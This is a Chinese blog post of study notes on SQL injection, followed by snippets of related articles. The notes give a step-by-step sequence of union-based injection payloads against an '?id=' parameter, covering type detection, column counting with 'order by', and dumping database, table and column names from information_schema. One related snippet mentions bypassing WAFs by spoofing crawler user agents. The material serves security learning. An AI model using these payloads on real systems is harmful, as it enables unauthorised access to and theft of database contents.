SQL注入漏洞学习简记

已于 2023-04-26 23:41:21 修改
阅读量527 收藏
点赞数
分类专栏: 安全 文章标签: sql 学习 安全
于 2023-04-26 23:41:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_61675401/article/details/130388669
版权

SQL注入漏洞危害 

id=1 and 1 = 1--+
id=1 and 1 = 2--+
id=1' and 1 = 1--+
id=1' and 1 = 2--+

可以用来判断是字符型注入/数字型注入


id=1' order by 3 --+
id=1' order by 4 --+

这些SQL注入语句中的 order by 子句用于对结果进行排序,而排序的字段编号是从 1 开始的。如果在 order by 子句中指定了一个大于当前查询结果字段数的数字,则数据库会返回一个错误,这表明当前查询的字段数目小于指定的字段编号。

?id=-1' union select 1,database(),3 --+

这里的1,3仅充当占位符号,保证union的列相同

这个SQL注入语句的目的是利用 UNION SELECT 连接两个 SELECT 查询的结果,从而泄露数据库信息。具体来说,它使用 database() 函数获取当前数据库的名称,并将其作为查询结果的一部分返回。因此,如果在查询结果中看到了数据库名称,则说明注入成功。

以下是一种可能的检测方法:

  1. 将注入语句作为查询发送到目标服务器。

  2. 检查查询结果是否包含一个数字为 1 和另一个数字为 3 的行。如果存在这样的行,则说明注入成功。

  3. 如果注入成功,将查询改为 ?id=-1' union select 1,2,table_name from information_schema.tables --+,这样就可以获取当前数据库中所有表的名称。

  4. 逐个尝试获取每个表的列名,方法是将查询改为 ?id=-1' union select 1,2,column_name from information_schema.columns where table_name='table_name_here' --+,其中 table_name_here 是要查询列名的表的名称。

  5. 如果想要使多列名于一行显示可以用下面代码

    ?id=-1' union select 1,2,GROUP_CONCAT(column_name) from information_schema.columns where table_name='users' --+

SQL注入漏洞详解
墨痕诉清风的博客
08-09 9452
" 预先编译好,也就是SQL引擎会预先进行语法分析,产生语法树,生成执行计划,也就是说,后面你输入的参数,无论你输入的是什么,都不会影响该SQL语句的语法结构了,因为语法分析已经完成了,而语法分析主要是分析SQL命令,比如 select、from 、where 、and、 or 、order by 等等。在这里,我们使用了占位符的方式,将该SQL传入prepare函数后,预处理函数就会得到本次查询语句的SQL模板类,并将这个模板类返回,模板可以防止传那些危险变量改变本身查询语句的语义。
sqlmap自动扫描注入点_简记——利用sqlmap检测网站sql注入漏洞获取数据
weixin_39834488的博客
11-26 1748
sqlmap是一个开源软件,用于检测和利用数据库漏洞,并提供了将恶意代码注入其中的选项。[1]它是一种渗透测试工具,可在终端中提供其用户界面,从而自动检测和利用SQL注入漏洞的过程。[2]该软件在命令行运行,可以下载用于不同的操作系统:Linux发行版,Windows和Mac OS操作系统。[3]除了映射和检测漏洞之外,该软件还可以访问数据库,编辑和删除数据以及查看表中的数据,例如用户,密码,备份...
网络安全基础——SQL注入漏洞(一)
LinAime的博客
12-21 5000
injection注入攻击数字&字符型注入联合查询注入宽字节注入防御方法 SQL注入的原理 前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 注入的关键在于构造闭合 本文章将以pikachu靶场作为演示实验场景 数字&字符型注入 数字型、字符型注入的判断 判断数字型:在注入点输入 a and 1=1 ,a and 1=2, 第一个返回正常第二次返回错误,则为数字型 判断字符型:基本原理同上,但是需加入单引号做闭合
SQL注入漏洞详解(一)
04-02 1739
收录于话题 #网络安全4#SQL注入1 注意:以下所有代码的环境:MySQL5.5.20+PHP SQL注入是因为后台SQL语句拼接了用户的输入,而且Web应用 程序对用户输入数据的合法性没有判断和过滤,前端传入后端的参数是攻击者可控的,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。比如查询、删除,增加,修改数据等等,如果数据库的用户权限足够大,还可以对操作系统执行操作。 SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致;后者主要是由于程序员对输入未
SQL Injection | SQL 注入 —— 报错盲注
Blue17 の 小窝
10-21 2300
John 替换为 Blue17
SQL注入之WAF绕过
weixin_47899104的博客
12-01 658
在攻防实战中,往往需要掌握一些特性,比如服务器、数据库、应用层、WAF层等,以便我们更灵活地构造payload,从而可以和各种waf进行对抗,甚至绕过安全防御措施进行漏洞利用。意义:有些语句,添加的某些特殊符号,并没有影响语句的执行效果。在 waf绕过中,检测这些特殊符号干扰了检测机制,从而绕过检测。伪造成百度,搜狐,谷歌的爬虫进行访问,速度很快,可以通过数据包伪造。User Agent可以很容易欺骗,我们可以伪装成爬虫尝试绕过。也可以自己写脚本来跑,避免爬出地路径是错的。①、url、ip白名单。
sqlmap读取mysql数据_简记——利用sqlmap检测网站sql注入漏洞获取数据
weixin_32126843的博客
02-04 647
sqlmap是一个开源软件,用于检测和利用数据库漏洞,并提供了将恶意代码注入其中的选项。[1]它是一种渗透测试工具,可在终端中提供其用户界面,从而自动检测和利用SQL注入漏洞的过程。[2]该软件在命令行运行,可以下载用于不同的操作系统:Linux发行版,Windows和Mac OS操作系统。[3]除了映射和检测漏洞之外,该软件还可以访问数据库,编辑和删除数据以及查看表中的数据,例如用户,密码,备份...
PHP 面试总结(持续更新) --小丑
Yan 小铁匠
03-18 2092
Session与cookie的区别? cookie数据存放在客户的浏览器上,session数据放在服务器上,以文件的形式存放,可以从php.ini里面的session.save_path找到存放位置 cookie不是很安全 ,cookie可以进行cookie欺骗,别人可以获取cookie中的session id考虑到安全应当使用session。 session会在一定时间内保存在服务器...
高级程序员必会的程序设计原则 —— 墨菲定律及防呆设计
杨若瑜的技术博客
05-31 2785
为什么团队总处于救火之中,又为何无论嘱咐多少次程序都会有BUG,很可能是违反了设计原则,本文带领你了解程序设计原则中的墨菲定律,举几个例子来阐述如何实现防呆设计,走出救火员的角色。
web基础漏洞SQL注入漏洞
m0_62274649的博客
10-04 1065
sql漏洞基础,仍需完善
解决:MySQL client, error code: 1251, SQLState: 08004
liulilittle的博客
05-28 368
MySQL认证协议不兼容问题解决方案:客户端报错1251是由于MySQL 8.0默认使用caching_sha2_password认证方式,而旧客户端不支持。可通过修改用户认证插件为mysql_native_password解决。修复步骤:1)执行ALTER USER修改认证方式;2)FLUSH PRIVILEGES刷新权限。该方法可快速解决客户端连接认证失败问题,适用于MySQL 8.0与旧版客户端的兼容场景。
【PostgreSQL 02】PostgreSQL数据类型革命:JSON、数组与地理信息让你的应用飞起来
熵数实验室
05-31 620
PostgreSQL的高级数据类型是其区别于传统关系数据库的核心优势。本文将通过实际案例深入解析JSON/JSONB、数组、地理信息等高级数据类型的使用方法和最佳实践。从电商用户画像到外卖配送系统,从社交网络到智慧城市,我们将看到这些数据类型如何让复杂的业务需求变得简单优雅。无论你是想要存储灵活的文档数据,还是需要处理复杂的地理位置信息,这篇文章都将为你提供完整的解决方案。
SQL中各个子句的执行顺序
初心不改
05-28 485
①首先一定先确定数据源:where > group by > 聚合函数 > having。
SQL】关键字
dddgggd的博客
05-29 378
例如:从表A 表B中计算每个device提问的平均数,因为一个device可以提多个问题,所以需要对device进行去重。ORDER BY(排序) 语句可以按照一个或多个列的值进行升序(ASC)或降序(DESC)排序。先从grades中查询所有有成绩记录的学生的id,通过id再从表students中查询学生的名字。与 MAX() 函数相对的是 MIN() 函数,它返回一组值中的最小值。关键字 JOIN、INNER JOIN的含义是一样的,都表示内连接。一个查询的查询条件是另一个查询的查询结果。
SQL进阶之旅 Day 6:数据更新最佳实践
在未来等你的专栏
05-28 1034
批量操作的正确使用方法,显著提高数据更新效率事务管理的重要性及其最佳实践不同数据库在数据更新方面的差异和优化策略通过实际案例展示了如何优化高并发场景下的数据更新性能测试方法和结果分析这些技术可以直接应用到实际工作中,特别是在电商、金融、库存管理等需要频繁更新数据的场景中。掌握这些技能可以帮助你编写更高效、更可靠的SQL代码,提升系统的整体性能和稳定性。明天我们将进入视图与存储过程入门,这将是SQL进阶之旅的一个重要转折点,为我们后面学习更高级的SQL技巧打下坚实基础。
Mybatis:灵活掌控SQL艺术
最新发布
m0_75169015的博客
05-31 815
Navicat 是一款功能强大且广受欢迎的数据库管理和开发工具,支持多种数据库系统。它由 PremiumSoft CyberTech Ltd. 开发,并面向数据库管理员、软件开发者等专业人士设计,旨在简化数据库管理流程,提高工作效率。
如何收集Oracle DB SQL Monitor报告
huiyangxu blog
05-28 570
可以通过企业管理器云控制(Enterprise Manager Cloud Control)或企业管理器数据库 express 版(EM Express),在性能中心(通过 “性能” 菜单进入)的 “已监控 SQL” 选项卡中,直接访问活动 SQL 监视器报告。可以通过sqldeveloper 管理工具–优化–实时SQL监视,选中要生成报告的SQL,点保存按钮就可以直接保存到本地。下面是12C的示例,如果你的网络里有统一管理的EM也可以查看。工具虽然是免费的,但是前提你要有相应的授权。
Android开发基础与高级组件学习简记
资源摘要信息:"本资料为Android学习简记,作者在Mac环境下进行Android学习,内容包含广播接收器(Broadcast-Receiver)、内容提供器(Content-Provider)、UI布局、各种XML命名空间(xmlns)、Fragment、第三方库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值